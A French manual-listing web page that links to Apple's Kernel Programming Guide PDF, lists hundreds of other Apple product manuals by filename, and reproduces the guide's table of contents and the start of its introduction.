Apple KernelProgramming.pdf Manuel Apple sur Fnac.com - Pour voir la liste complète des manuels APPLE, cliquez ici

 

 

TELECHARGER LE PDF sur :

https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/KernelProgramming.pdf

Commander un produit Apple sur Fnac.com

 

 

Voir également d'autres Guides APPLE :

Apple-Instrumentos_y_efectos_de_Logic_Studio.pdf-Manuel

Apple-ipod_nano_kayttoopas.pdf-Finlande-Manuel

Apple_ProRes_White_Paper_October_2012.pdf-Manuel

Apple-wp_osx_configuration_profiles.pdf-Manuel

Apple-UsingiTunesProducerFreeBooks.pdf-Manuel

Apple-ipad_manual_do_usuario.pdf-Portugais-Manuel

Apple-Instruments_et_effets_Logic_Studio.pdf-Manuel

Apple-ipod_touch_gebruikershandleiding.pdf-Neerlandais-Manuel

AppleiPod_shuffle_4thgen_Manual_del_usuario.pdf-Espagnol-Manuel

Apple-Premiers-contacts-avec-votre-PowerBook-G4-Manuel

Apple_Composite_AV_Cable.pdf-Manuel

Apple-iPod_shuffle_3rdGen_UG_DK.pdf-Danemark-Manuel

Apple-iPod_classic_160GB_Benutzerhandbuch.pdf-Allemand-Manuel

Apple-VoiceOver_GettingStarted-Manuel

Apple-iPod_touch_2.2_Benutzerhandbuch.pdf-Allemand-Manuel

Apple-Apple_TV_Opstillingsvejledning.pdf-Allemand-Manuel

Apple-iPod_shuffle_4thgen_Manuale_utente.pdf-Italie-Manuel

Apple-iphone_prirucka_uzivatela.pdf-Manuel

Apple-Aan-de-slag-Neerlandais-Manuel

Apple-airmac_express-80211n-2nd-gen_setup_guide.pdf-Thailande-Manuel

Apple-ipod_nano_benutzerhandbuch.pdf-Allemand-Manuel

Apple-aperture3.4_101.pdf-Manuel

Apple-Pages09_Anvandarhandbok.pdf-Manuel

Apple-nike_plus_ipod_sensor_ug_la.pdf-Mexique-Manuel

Apple-ResEdit-Reference-For-ResEdit02.1-Manuel

Apple-ipad_guide_de_l_utilisateur.pdf-Manuel

Apple-Compressor-4-Benutzerhandbuch-Allemand-Manuel

Apple-AirPort_Networks_Early2009_DK.pdf-Danemark-Manuel

Apple-MacBook_Pro_Mid2007_2.4_2.2GHz_F.pdf-Manuel

Apple-MacBook_13inch_Mid2010_UG_F.pdf-Manuel

Apple-Xserve-RAID-Presentation-technologique-Janvier-2004-Manuel

Apple-MacBook_Pro_15inch_Mid2010_F.pdf-Manuel

Apple-AirPort_Express-opstillingsvejledning.pdf-Danemark-Manuel

Apple-DEiPod_photo_Benutzerhandbuch_DE0190269.pdf-Allemand-Manuel

Apple-Final-Cut-Pro-X-Logic-Effects-Reference-Manuel

Apple-iPod_touch_2.1_Brugerhandbog.pdf-Danemark-Manuel

Apple-Remote-Desktop-Administratorhandbuch-Version-3.1-Allemand-Manuel

Apple-Qmaster-4-User-Manual-Manuel

Apple-Server_Administration_v10.5.pdf-Manuel

Apple-ipod_classic_features_guide.pdf-Manuel

Apple-Lecteur-Optique-Manuel

Apple-Carte-AirPort-Manuel

Apple-iPhone_Finger_Tips_Guide.pdf-Anglais-Manuel

Apple-Couvercle-Manuel

Apple-battery.cube.pdf-Manuel

Apple-Boitier-de-l-ordinateur-Manuel

Apple-Pile-Interne-Manuel

Apple-atacable.pdf-Manuel

Apple-videocard.pdf-Manuel

Apple-Guide_de_configuration_de_l_Airport_Express_5.1.pdf-Manuel

Apple-iMac_Mid2010_UG_F.pdf-Manuel

Apple-MacBook_13inch_Mid2009_F.pdf-Manuel

Apple-MacBook_Mid2007_UserGuide.F.pdf-Manuel

Apple-Designing_AirPort_Networks_10.5-Windows_F.pdf-Manuel

Apple-Administration_de_QuickTime_Streaming_et_Broadcasting_10.5.pdf-Manuel

Apple-Opstillingsvejledning_til_TimeCapsule.pdf-Danemark-Manuel

Apple-iPod_nano_5th_gen_Benutzerhandbuch.pdf-Manuel

Apple-iOS_Business.pdf-Manuel

Apple-AirPort_Extreme_Installationshandbuch.pdf-Manuel

Apple-Final_Cut_Express_4_Installation_de_votre_logiciel.pdf-Manuel

Apple-MacBook_Pro_15inch_2.53GHz_Mid2009.pdf-Manuel

Apple-Network_Services.pdf-Manuel

Apple-Aperture_Performing_Adjustments_f.pdf-Manuel

Apple-Supplement_au_guide_Premiers_contacts.pdf-Manuel

Apple-Administration_des_images_systeme_et_de_la_mise_a_jour_de_logiciels_10.5.pdf-Manuel

Apple-Mac_OSX_Server_v10.6_Premiers_contacts.pdf-Francais-Manuel

Apple-Designing_AirPort_Networks_10.5-Windows_F.pdf-Manuel

Apple-Mise_a_niveau_et_migration_v10.5.pdf-Manue

Apple-MacBookPro_Late_2007_2.4_2.2GHz_F.pdf-Manuel

Apple-Mac_mini_Late2009_SL_Server_F.pdf-Manuel

Apple-Mac_OS_X_Server_10.5_Premiers_contacts.pdf-Manuel

Apple-iPod_touch_2.0_Guide_de_l_utilisateur_CA.pdf-Manuel

Apple-MacBook_Pro_17inch_Mid2010_F.pdf-Manuel

Apple-Comment_demarrer_Leopard.pdf-Manuel

Apple-iPod_2ndGen_USB_Power_Adapter-FR.pdf-Manuel

Apple-Feuille_de_operations_10.4.pdf-Manuel

Apple-Time_Capsule_Installationshandbuch.pdf-Allemand-Manuel

Apple-F034-2262AXerve-grappe.pdf-Manuel

Apple-Mac_Pro_Early2009_4707_UG_F

Apple-imacg5_17inch_Power_Supply

Apple-Logic_Studio_Installieren_Ihrer_Software_Retail

Apple-IntroductionXserve1.0.1

Apple-Aperture_Getting_Started_d.pdf-Allemand

Apple-getting_started_with_passbook

Apple-iPod_mini_2nd_Gen_UserGuide.pdf-Anglais

Apple-Deploiement-d-iPhone-et-d-iPad-Reseaux-prives-virtuels

Apple-F034-2262AXerve-grappe

Apple-Mac_OS_X_Server_Glossaire_10.5

Apple-FRLogic_Pro_7_Guide_TDM

Apple-iphone_bluetooth_headset_userguide

Apple-Administration_des_services_reseau_10.5

Apple-imacg5_17inch_harddrive

Apple-iPod_nano_4th_gen_Manuale_utente

Apple-iBook-G4-Getting-Started

Apple-XsanGettingStarted

Apple-Mac_mini_UG-Early2006

Apple-Guide_des_fonctionnalites_de_l_iPod_classic

Apple-Guide_de_configuration_d_Xsan_2

Apple-MacBook_Late2006_UsersGuide

Apple-sur-Fnac.com

Apple-Mac_mini_Mid2010_User_Guide_F.pdf-Francais

Apple-PowerBookG3UserManual.PDF.Anglais

Apple-Installation_de_votre_logiciel_Logic_Studio_Retail

Apple-Pages-Guide-de-l-utilisateur

Apple-MacBook_Pro_13inch_Mid2009.pdf.Anglais

Apple-MacBook_Pro_15inch_Mid2009

Apple-Installation_de_votre_logiciel_Logic_Studio_Upgrade

Apple-FRLogic_Pro_7_Guide_TDM

Apple-airportextreme_802.11n_userguide

Apple-iPod_shuffle_3rdGen_UG

Apple-iPod_classic_160GB_User_Guide

Apple-iPod_nano_5th_gen_UserGuide

Apple-ipod_touch_features_guide

Apple-Wireless_Mighty_Mouse_UG

Apple-Advanced-Memory-Management-Programming-Guide

Apple-iOS-App-Programming-Guide

Apple-Concurrency-Programming-Guide

Apple-MainStage-2-User-Manual-Anglais

Apple-iMacG3_2002MultilingualUserGuide

Apple-iBookG3_DualUSBUserGuideMultilingual.PDF.Anglais

Apple-imacG5_20inch_AirPort

Apple-Guide_de_l_utilisateur_de_Mac_Pro_Early_2008

Apple-Installation_de_votre_logiciel_Logic_Express_8

Apple-iMac_Guide_de_l_utilisateur_Mid2007

Apple-imacg5_20inch_OpticalDrive

Apple-FCP6_Formats_de_diffusion_et_formats_HD

Apple-prise_en_charge_des_surfaces_de_controle_logic_pro_8

Apple-Aperture_Quick_Reference_f

Apple-Shake_4_User_Manual

Apple-aluminumAppleKeyboard_wireless2007_UserGuide

Apple-ipod_shuffle_features_guide

Apple-Color-User-Manual

Apple-XsanGettingStarted

Apple-Migration_10.4_2e_Ed

Apple-MacBook_Air_SuperDrive

Apple-MacBook_Late2007-f

ApplePowerMacG5_(Early_2005)_UserGuide

Apple-iSightUserGuide

Apple-MacBook_Pro_Early_2008_Guide_de_l_utilisateur

Apple-Nouvelles-fonctionnalites-aperture-1.5

Apple-premiers_contacts_2e_ed_10.4.pdf-Mac-OS-X-Server

Apple-premiers_contacts_2e_ed_10.4

Apple-eMac_2005UserGuide

Apple-imacg5_20inch_Inverter

Apple-Keynote2_UserGuide.pdf-Japon

Apple-Welcome_to_Tiger.pdf-Japon

Apple-XsanAdminGuide_j.pdf-Japon

Apple-PowerBookG4_UG_15GE.PDF-Japon

Apple-Xsan_Migration.pdf-Japon

Apple-Xserve_Intel_DIY_TopCover_JA.pdf-Japon

Apple-iPod_nano_6thgen_User_Guide_J.pdf-Japon

Apple-Aperture_Photography_Fundamentals.pdf-Japon

Apple-nikeipod_users_guide.pdf-Japon

Apple-QuickTime71_UsersGuide.pdf-Japon

Apple-iMacG5_iSight_UG.pdf-Japon

Apple-Aperture_Performing_Adjustments_j.pdf-Japon

Apple-iMacG5_17inch_HardDrive.pdf-Japon

Apple-iPod_shuffle_Features_Guide_J.pdf-Japon

Apple-MacBook_Air_User_Guide.pdf-Japon

Apple-MacBook_UsersGuide.pdf-Japon

Apple-iPad_iOS4_Brukerhandbok.pdf-Norge-Norvege

Apple-Apple_AirPort_Networks_Early2009_H.pd-Norge-Norvege

Apple-iPod_classic_120GB_no.pdf-Norge-Norvege

Apple-StoreKitGuide.pdf-Japon

Apple-Xserve_Intel_DIY_ExpansionCardRiser_JA.pdf-Japon

Apple-iMacG5_Battery.pdf-Japon

Apple-Logic_Pro_8_Getting_Started.pdf-Japon

Apple-PowerBook-handbok-Norge-Norveg

Apple-iWork09_formler_og_funksjoner.pdf-Norge-Norvege

Apple-MacBook_Pro_15inch_Mid2010_H.pdf-Norge-Norvege

Apple-MacPro_HardDrive_DIY.pdf-Japon

Apple-iPod_Fifth_Gen_Funksjonsoversikt.pdf-Norge-Norvege

Apple-MacBook_13inch_white_Early2009_H.pdf-Norge-Norvege

Apple-GarageBand_09_Komme_i_gang.pdf-Norge-Norvege

Apple-MacBook_Pro_15inch_Mid2009_H.pdf-Norge-Norvege

Apple-imac_mid2011_ug_h.pdf-Norge-Norvege

Apple-iDVD_08_Komme_i_gang.pdf-Norge-Norvege

Apple-MacBook_Air_11inch_Late2010_UG_H.pdf-Norge-Norvege

Apple-iMac_Mid2010_UG_H.pdf-Norge-Norvege

Apple-MacBook_13inch_Mid2009_H.pdf-Norge-Norvege

/Apple-iPhone_3G_Viktig_produktinformasjon_H-Norge-Norvege

Apple-MacBook_13inch_Mid2010_UG_H.pdf-Norge-Norvege

Apple-macbook_air_13inch_mid2011_ug_no.pdf-Norge-Norvege

Apple-Mac_mini_Early2009_UG_H.pdf-Norge-Norvege

Apple-ipad2_brukerhandbok.pdf-Norge-Norvege

Apple-iPhoto_08_Komme_i_gang.pdf-Norge-Norvege

Apple-MacBook_Air_Brukerhandbok_Late2008.pdf-Norge-Norvege

Apple-Pages09_Brukerhandbok.pdf-Norge-Norvege

Apple-MacBook_13inch_Late2009_UG_H.pdf-Norge-Norvege

Apple-iPhone_3GS_Viktig_produktinformasjon.pdf-Norge-Norvege

Apple-MacBook_13inch_Aluminum_Late2008_H.pdf-Norge-Norvege

Apple-Wireless_Keyboard_Aluminum_2007_H-Norge-Norvege

Apple-NiPod_photo_Brukerhandbok_N0190269.pdf-Norge-Norvege

Apple-MacBook_Pro_13inch_Mid2010_H.pdf-Norge-Norvege

Apple-MacBook_Pro_17inch_Mid2010_H.pdf-Norge-Norvege

Apple-Velkommen_til_Snow_Leopard.pdf-Norge-Norvege.htm

Apple-TimeCapsule_Klargjoringsoversikt.pdf-Norge-Norvege

Apple-iPhone_3GS_Hurtigstart.pdf-Norge-Norvege

Apple-Snow_Leopard_Installeringsinstruksjoner.pdf-Norge-Norvege

Apple-iMacG5_iSight_UG.pdf-Norge-Norvege

Apple-iPod_Handbok_S0342141.pdf-Norge-Norvege

Apple-ipad_brukerhandbok.pdf-Norge-Norvege

Apple-GE_Money_Bank_Handlekonto.pdf-Norge-Norvege

Apple-MacBook_Air_11inch_Late2010_UG_H.pdf-Norge-Norvege

Apple-iPod_nano_6thgen_Brukerhandbok.pdf-Norge-Norvege

Apple-iPod_touch_iOS4_Brukerhandbok.pdf-Norge-Norvege

Apple-MacBook_Air_13inch_Late2010_UG_H.pdf-Norge-Norvege

Apple-MacBook_Pro_15inch_Early2011_H.pdf-Norge-Norvege

Apple-Numbers09_Brukerhandbok.pdf-Norge-Norvege

Apple-Welcome_to_Leopard.pdf-Japon

Apple-PowerMacG5_UserGuide.pdf-Norge-Norvege

Apple-iPod_touch_2.1_Brukerhandbok.pdf-Norge-Norvege

Apple-Boot_Camp_Installering-klargjoring.pdf-Norge-Norvege

Apple-MacOSX10.3_Welcome.pdf-Norge-Norvege

Apple-iPod_shuffle_3rdGen_UG_H.pdf-Norge-Norvege

Apple-iPhone_4_Viktig_produktinformasjon.pdf-Norge-Norvege

Apple_TV_Klargjoringsoversikt.pdf-Norge-Norvege

Apple-iMovie_08_Komme_i_gang.pdf-Norge-Norvege

Apple-iPod_classic_160GB_Brukerhandbok.pdf-Norge-Norvege

Apple-Boot_Camp_Installering_10.6.pdf-Norge-Norvege

Apple-Network-Services-Location-Manager-Veiledning-for-nettverksadministratorer-Norge-Norvege

Apple-iOS_Business_Mar12_FR.pdf

Apple-PCIDualAttachedFDDICard.pdf

Apple-Aperture_Installing_Your_Software_f.pdf

Apple-User_Management_Admin_v10.4.pdf

Apple-Compressor-4-ユーザーズマニュアル Japon

Apple-Network_Services_v10.4.pdf

Apple-iPod_2ndGen_USB_Power_Adapter-DE

Apple-Mail_Service_v10.4.pdf

Apple-AirPort_Express_Opstillingsvejledning_5.1.pdf

Apple-MagSafe_Airline_Adapter.pdf

Apple-L-Apple-Multiple-Scan-20-Display

Apple-Administration_du_service_de_messagerie_10.5.pdf

Apple-System_Image_Admin.pdf

Apple-iMac_Intel-based_Late2006.pdf-Japon

Apple-iPhone_3GS_Finger_Tips_J.pdf-Japon

Apple-Power-Mac-G4-Mirrored-Drive-Doors-Japon

Apple-AirMac-カード取り付け手順-Japon

Apple-iPhone開発ガイド-Japon

Apple-atadrive_pmg4mdd.j.pdf-Japon

Apple-iPod_touch_2.2_User_Guide_J.pdf-Japon

Apple-Mac_OS_X_Server_v10.2.pdf

Apple-AppleCare_Protection_Plan_for_Apple_TV.pdf

Apple_Component_AV_Cable.pdf

Apple-DVD_Studio_Pro_4_Installation_de_votre_logiciel

Apple-Windows_Services

Apple-Motion_3_New_Features_F

Apple-g4mdd-fw800-lowerfan

Apple-MacOSX10.3_Welcome

Apple-Print_Service

Apple-Xserve_Setup_Guide_F

Apple-PowerBookG4_17inch1.67GHzUG

Apple-iMac_Intel-based_Late2006

Apple-Installation_de_votre_logiciel

Apple-guide_des_fonctions_de_l_iPod_nano

Apple-Administration_de_serveur_v10.5

Apple-Mac-OS-X-Server-Premiers-contacts-Pour-la-version-10.3-ou-ulterieure

Apple-boot_camp_install-setup

Apple-iBookG3_14inchUserGuideMultilingual

Apple-mac_pro_server_mid2010_ug_f

Apple-Motion_Supplemental_Documentation

Apple-imac_mid2011_ug_f

Apple-iphone_guide_de_l_utilisateur

Apple-macbook_air_11inch_mid2011_ug_fr

Apple-NouvellesfonctionnalitesdeLogicExpress7.2

Apple-QT_Streaming_Server

Apple-Web_Technologies_Admin

Apple-Mac_Pro_Early2009_4707_UG

Apple-guide_de_l_utilisateur_de_Numbers08

Apple-Decouverte_d_Aperture_2

Apple-Guide_de_configuration_et_d'administration

Apple-mac_integration_basics_fr_106.

Apple-iPod_shuffle_4thgen_Guide_de_l_utilisateur

Apple-ARA_Japan

Apple-081811_APP_iPhone_Japanese_v5.4.pdf-Japan

Apple-Recycle_Contract120919.pdf-Japan

Apple-World_Travel_Adapter_Kit_UG

Apple-iPod_nano_6thgen_User_Guide

Apple-RemoteSupportJP

Apple-Mac_mini_Early2009_UG_F.pdf-Manuel-de-l-utilisateur

Apple-Compressor_3_Batch_Monitor_User_Manual_F.pdf-Manuel-de-l-utilisateur

Apple-Premiers__contacts_avec_iDVD_08

Apple-Mac_mini_Intel_User_Guide.pdf

Apple-Prise_en_charge_des_surfaces_de_controle_Logic_Express_8

Apple-mac_integration_basics_fr_107.pdf

Apple-Final-Cut-Pro-7-Niveau-1-Guide-de-preparation-a-l-examen

Apple-Logic9-examen-prep-fr.pdf-Logic-Pro-9-Niveau-1-Guide-de-preparation-a-l-examen

Apple-aperture_photography_fundamentals.pdf-Manuel-de-l-utilisateu

Apple-emac-memory.pdf-Manuel-de-l-utilisateur

Apple-Apple-Installation-et-configuration-de-votre-Power-Mac-G4

Apple-Guide_de_l_administrateur_d_Xsan_2.pdf

Apple-premiers_contacts_avec_imovie6.pdf

Apple-Tiger_Guide_Installation_et_de_configuration.pdf

Apple-Final-Cut-Pro-7-Level-One-Exam-Preparation-Guide-and-Practice-Exam

Apple-Open_Directory.pdf

Apple-Nike_+_iPod_User_guide

Apple-ard_admin_guide_2.2_fr.pdf

Apple-systemoverviewj.pdf-Japon

Apple-Xserve_TO_J070411.pdf-Japon

Apple-Mac_Pro_User_Guide.pdf

Apple-iMacG5_iSight_UG.pdf

Apple-premiers_contacts_avec_iwork_08.pdf

Apple-services_de_collaboration_2e_ed_10.4.pdf

Apple-iPhone_Bluetooth_Headset_Benutzerhandbuch.pdf

Apple-Guide_de_l_utilisateur_de_Keynote08.pdf

APPLE/Apple-Logic-Pro-9-Effectsrfr.pdf

Apple-Logic-Pro-9-Effectsrfr.pdf

Apple-iPod_shuffle_3rdGen_UG_F.pdf

Apple-iPod_classic_160Go_Guide_de_l_utilisateur.pdf

Apple-iBookG4GettingStarted.pdf

Apple-Administration_de_technologies_web_10.5.pdf

Apple-Compressor-4-User-Manual-fr

Apple-MainStage-User-Manual-fr.pdf

Apple-Logic_Pro_8.0_lbn_j.pdf

Apple-PowerBookG4_15inch1.67-1.5GHzUserGuide.pdf

Apple-MacBook_Pro_15inch_Mid2010_CH.pdf

Apple-LED_Cinema_Display_27-inch_UG.pdf

Apple-MacBook_Pro_15inch_Mid2009_RS.pdf

Apple-macbook_pro_13inch_early2011_f.pdf

Apple-iMac_Mid2010_UG_BR.pdf

Apple-iMac_Late2009_UG_J.pdf

Apple-iphone_user_guide-For-iOS-6-Software

Apple-iDVD5_Getting_Started.pdf

Apple-guide_des_fonctionnalites_de_l_ipod_touch.pdf

Apple_iPod_touch_User_Guide

Apple_macbook_pro_13inch_early2011_f

Apple_Guide_de_l_utilisateur_d_Utilitaire_RAID

Apple_Time_Capsule_Early2009_Setup_F

Apple_iphone_4s_finger_tips_guide_rs

Apple_iphone_upute_za_uporabu

Apple_ipad_user_guide_ta

Apple_iPod_touch_User_Guide

apple_earpods_user_guide

apple_iphone_gebruikershandleiding

apple_iphone_5_info

apple_iphone_brukerhandbok

apple_apple_tv_3rd_gen_setup_tw

apple_macbook_pro-retina-mid-2012-important_product_info_ch

apple_Macintosh-User-s-Guide-for-Macintosh-PowerBook-145

Apple_ipod_touch_user_guide_ta

Apple_TV_2nd_gen_Setup_Guide_h

Apple_ipod_touch_manual_del_usuario

Apple_iphone_4s_finger_tips_guide_tu

Apple_macbook_pro_retina_qs_th

Apple-Manuel_de_l'utilisateur_de_Final_Cut_Server

Apple-iMac_G5_de_lutilisateur

Apple-Cinema_Tools_4.0_User_Manual_F

Apple-Personal-LaserWriter300-User-s-Guide

Apple-QuickTake-100-User-s-Guide-for-Macintosh

Apple-User-s-Guide-Macintosh-LC-630-DOS-Compatible

Apple-iPhone_iOS3.1_User_Guide

Apple-iphone_4s_important_product_information_guide

Apple-iPod_shuffle_Features_Guide_F

Liste-documentation-apple

Apple-Premiers_contacts_avec_iMovie_08

Apple-macbook_pro-retina-mid-2012-important_product_info_br

Apple-macbook_pro-13-inch-mid-2012-important_product_info

Apple-macbook_air-11-inch_mid-2012-qs_br

Apple-Manuel_de_l_utilisateur_de_MainStage

Apple-Compressor_3_User_Manual_F

Apple-Color_1.0_User_Manual_F

Apple-guide_de_configuration_airport_express_4.2

Apple-TimeCapsule_SetupGuide

Apple-Instruments_et_effets_Logic_Express_8

Apple-Manuel_de_l_utilisateur_de_WaveBurner

Apple-Macmini_Guide_de_l'utilisateur

Apple-PowerMacG5_UserGuide

Disque dur, ATA parallèle Instructions de remplacement

Apple-final_cut_pro_x_logic_effects_ref_f

Apple-Leopard_Installationshandbok

Manuale Utente PowerBookG4

Apple-thunderbolt_display_getting_started_1e

Apple-Compressor-4-Benutzerhandbuch

Apple-macbook_air_11inch_mid2011_ug

Apple-macbook_air-mid-2012-important_product_info_j

Apple-iPod-nano-Guide-des-fonctionnalites

Apple-iPod-nano-Guide-des-fonctionnalites

Apple-iPod-nano-Guide-de-l-utilisateur-4eme-generation

Apple-iPod-nano-Guide-de-l-utilisateur-4eme-generation

Apple-Manuel_de_l_utilisateur_d_Utilitaire_de_reponse_d_impulsion

Apple-Aperture_2_Raccourcis_clavier

AppleTV_Setup-Guide

Apple-livetype_2_user_manual_f

Apple-imacG5_17inch_harddrive

Apple-macbook_air_guide_de_l_utilisateur

Apple-MacBook_Early_2008_Guide_de_l_utilisateur

Apple-Keynote-2-Guide-de-l-utilisateur

Apple-PowerBook-User-s-Guide-for-PowerBook-computers

Apple-Macintosh-Performa-User-s-Guide-5200CD-and-5300CD

Apple-Macintosh-Performa-User-s-Guide

Apple-Workgroup-Server-Guide

Apple-iPod-nano-Guide-des-fonctionnalites

Apple-iPad-User-Guide-For-iOS-5-1-Software

Apple-Boot-Camp-Guide-d-installation-et-de-configuration

Apple-iPod-nano-Guide-de-l-utilisateur-4eme-generation

Power Mac G5 Guide de l’utilisateur APPLE

Guide de l'utilisateur PAGE '08 APPLE

Guide de l'utilisateur KEYNOTE '09 APPLE

Guide de l'Utilisateur KEYNOTE '3 APPLE

Guide de l'Utilisateur UTILITAIRE RAID

Guide de l'Utilisateur Logic Studio

Power Mac G5 Guide de l’utilisateur APPLE

Guide de l'utilisateur PAGE '08 APPLE

Guide de l'utilisateur KEYNOTE '09 APPLE

Guide de l'Utilisateur KEYNOTE '3 APPLE

Guide de l'Utilisateur UTILITAIRE RAID

Guide de l'Utilisateur Logic Studio

Guide de l’utilisateur ipad Pour le logiciel iOS 5.1

PowerBook G4 Premiers Contacts APPLE

Guide de l'Utilisateur iphone pour le logiciel ios 5.1 APPLE

Guide de l’utilisateur ipad Pour le logiciel iOS 4,3

Guide de l’utilisateur iPod nano 5ème génération

Guide de l'utilisateur iPod Touch 2.2 APPLE

Guide de l’utilisateur QuickTime 7  Mac OS X 10.3.9 et ultérieur Windows XP et Windows 2000

Guide de l'utilisateur MacBook 13 pouces Mi 2010

Guide de l’utilisateur iPhone (Pour les logiciels iOS 4.2 et 4.3)

Guide-de-l-utilisateur-iPod-touch-pour-le-logiciel-ios-4-3-APPLE

Guide-de-l-utilisateur-iPad-2-pour-le-logiciel-ios-4-3-APPLE

Guide de déploiement en entreprise iPhone OS

Guide-de-l-administrateur-Apple-Remote-Desktop-3-1

Guide-de-l-utilisateur-Apple-Xserve-Diagnostics-Version-3X103

Guide-de-configuration-AirPort-Extreme-802.11n-5e-Generation

Guide-de-configuration-AirPort-Extreme-802-11n-5e-Generation

Guide-de-l-utilisateur-Capteur-Nike-iPod

Guide-de-l-utilisateur-iMac-21-5-pouces-et-27-pouces-mi-2011-APPLE

Guide-de-l-utilisateur-Apple-Qadministrator-4

Guide-d-installation-Apple-TV-3-eme-generation

User-Guide-iPad-For-ios-5-1-Software

Kernel Programming GuideContents About This Document 9 Who Should Read This Document 9 Road Map 9 Other Apple Publications 11 Mach API Reference 11 Information on the Web 12 Keep Out 13 Why You Should Avoid Programming in the Kernel 13 Kernel Architecture Overview 14 Darwin 15 Architecture 16 Mach 17 BSD 18 I/O Kit 19 Kernel Extensions 19 The Early Boot Process 21 Boot ROM 21 The Boot Loader 21 Rooting 22 Security Considerations 24 Security Implications of Paging 25 Buffer Overflows and Invalid Input 26 User Credentials 27 Basic User Credentials 28 Access Control Lists 29 Remote Authentication 29 One-Time Pads 30 Time-based authentication 30 Temporary Files 31 /dev/mem and /dev/kmem 31 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 2Key-based Authentication and Encryption 32 Public Key Weaknesses 33 Using Public Keys for Message Exchange 35 Using Public Keys for Identity Verification 35 Using Public Keys for Data Integrity Checking 35 Encryption Summary 36 Console Debugging 36 Code Passing 37 Performance Considerations 39 Interrupt Latency 39 Locking Bottlenecks 40 Working With Highly Contended Locks 40 Reducing Contention by Decreasing Granularity 41 Code Profiling 42 Using Counters for Code Profiling 42 Lock Profiling 43 Kernel Programming Style 45 C++ Naming Conventions 45 Basic Conventions 45 Additional Guidelines 46 Standard C Naming Conventions 47 Commonly Used Functions 48 Performance and Stability Tips 50 Performance and Stability Tips 50 Stability Tips 52 Style Summary 52 Mach Overview 53 Mach Kernel Abstractions 53 Tasks and Threads 54 Ports, Port Rights, Port Sets, and Port Namespaces 55 Memory Management 57 Interprocess Communication (IPC) 58 IPC Transactions and Event Dispatching 59 Message Queues 59 Semaphores 59 Notifications 60 Locks 60 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 3 ContentsRemote Procedure Call (RPC) Objects 60 Time Management 60 Memory and Virtual Memory 61 OS X VM Overview 61 Memory Maps Explained 63 Named Entries 64 Universal Page Lists (UPLs) 65 Using Mach Memory Maps 66 Other VM and VM-Related Subsystems 68 Pagers 68 Working Set Detection Subsystem 69 VM Shared Memory Server Subsystem 69 Address Spaces 70 Background Info on PCI Address Translation 70 IOMemoryDescriptor Changes 71 VM System and pmap Changes: 72 Kernel Dependency Changes 72 Summary 72 Allocating Memory in the Kernel 73 Allocating Memory From a Non-I/O-Kit Kernel Extension 73 Allocating Memory From the I/O Kit 74 Allocating Memory In the Kernel Itself 75 Mach Scheduling and Thread Interfaces 77 Overview of Scheduling 77 Why Did My Thread Priority Change? 78 Using Mach Scheduling From User Applications 79 Using the pthreads API to Influence Scheduling 79 Using the Mach Thread API to Influence Scheduling 80 Using the Mach Task API to Influence Scheduling 83 Kernel Thread APIs 85 Creating and Destroying Kernel Threads 85 SPL and Friends 86 Wait Queues and Wait Primitives 87 Bootstrap Contexts 91 How Contexts Affect Users 92 How Contexts Affect Developers 93 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 4 ContentsI/O Kit Overview 94 Redesigning the I/O Model 94 I/O Kit Architecture 96 Families 96 Drivers 97 Nubs 97 Connection Example 98 For More Information 100 BSD Overview 101 BSD Facilities 102 Differences between OS X and BSD 103 For Further Reading 104 File Systems Overview 106 Working With the File System 106 VFS Transition 107 Network Architecture 108 Boundary Crossings 109 Security Considerations 110 Choosing a Boundary Crossing Method 110 Kernel Subsystems 111 Bandwidth and Latency 111 Mach Messaging and Mach Interprocess Communication (IPC) 112 Using Well-Defined Ports 113 Remote Procedure Calls (RPC) 113 Calling RPC From User Applications 116 BSD syscall API 116 BSD ioctl API 116 BSD sysctl API 117 General Information on Adding a sysctl 118 Adding a sysctl Procedure Call 118 Registering a New Top Level sysctl 121 Adding a Simple sysctl 122 Calling a sysctl From User Space 123 Memory Mapping and Block Copying 125 Summary 127 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 5 ContentsSynchronization Primitives 128 Semaphores 128 Condition Variables 130 Locks 132 Spinlocks 132 Mutexes 134 Read-Write Locks 136 Spin/Sleep Locks 138 Using Lock Functions 139 Miscellaneous Kernel Services 142 Using Kernel Time Abstractions 142 Obtaining Time Information 142 Event and Timer Waits 143 Handling Version Dependencies 145 Boot Option Handling 146 Queues 147 Installing Shutdown Hooks 148 Kernel Extension Overview 150 Implementation of a Kernel Extension (KEXT) 151 Kernel Extension Dependencies 151 Building and Testing Your Extension 152 Debugging Your KEXT 153 Installed KEXTs 154 Building and Debugging Kernels 155 Adding New Files or Modules 155 Modifying the Configuration Files 155 Modifying the Source Code Files 157 Building Your First Kernel 158 Building an Alternate Kernel Configuration 160 When Things Go Wrong: Debugging the Kernel 161 Setting Debug Flags in Open Firmware 161 Avoiding Watchdog Timer Problems 163 Choosing a Debugger 164 Using gdb for Kernel Debugging 164 Using ddb for Kernel Debugging 169 Bibliography 175 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 6 ContentsApple OS X Publications 175 General UNIX and Open Source Resources 175 BSD and UNIX Internals 176 Mach 177 Networking 178 Operating Systems 179 POSIX 179 Programming 179 Websites and Online Resources 180 Security and Cryptography 181 Document Revision History 182 Glossary 184 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 7 ContentsFigures, Tables, and Listings Kernel Architecture Overview 14 Figure 3-1 OS X architecture 14 Figure 3-2 Darwin and OS X 15 Figure 3-3 OS X kernel architecture 16 Kernel Programming Style 45 Table 7-1 Commonly used C functions 49 Mach Scheduling and Thread Interfaces 77 Table 10-1 Thread priority bands 77 Table 10-2 Thread policies 81 Table 10-3 Task roles 83 I/O Kit Overview 94 Figure 12-1 I/O Kit architecture 98 Synchronization Primitives 128 Listing 17-1 Allocating lock attributes and groups (lifted liberally from kern_time.c) 139 Building and Debugging Kernels 155 Table 20-1 Debugging flags 163 Table 20-2 Switch options in ddb 171 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 8The purpose of this document is to provide fundamental high-level information about the OS X core operating-system architecture. It also provides background for system programmers and developers of device drivers, file systems, and network extensions. In addition, it goes into detail about topics of interest to kernel programmers as a whole. This is not a document on drivers. It covers device drivers at a high level only. It does, however, cover some areas of interest to driver writers, such as crossing the user-kernel boundary. If you are writing device drivers, you should primarily read the document I/O Kit Fundamentals, but you may still find this document helpful as background reading. Who Should Read This Document This document has a 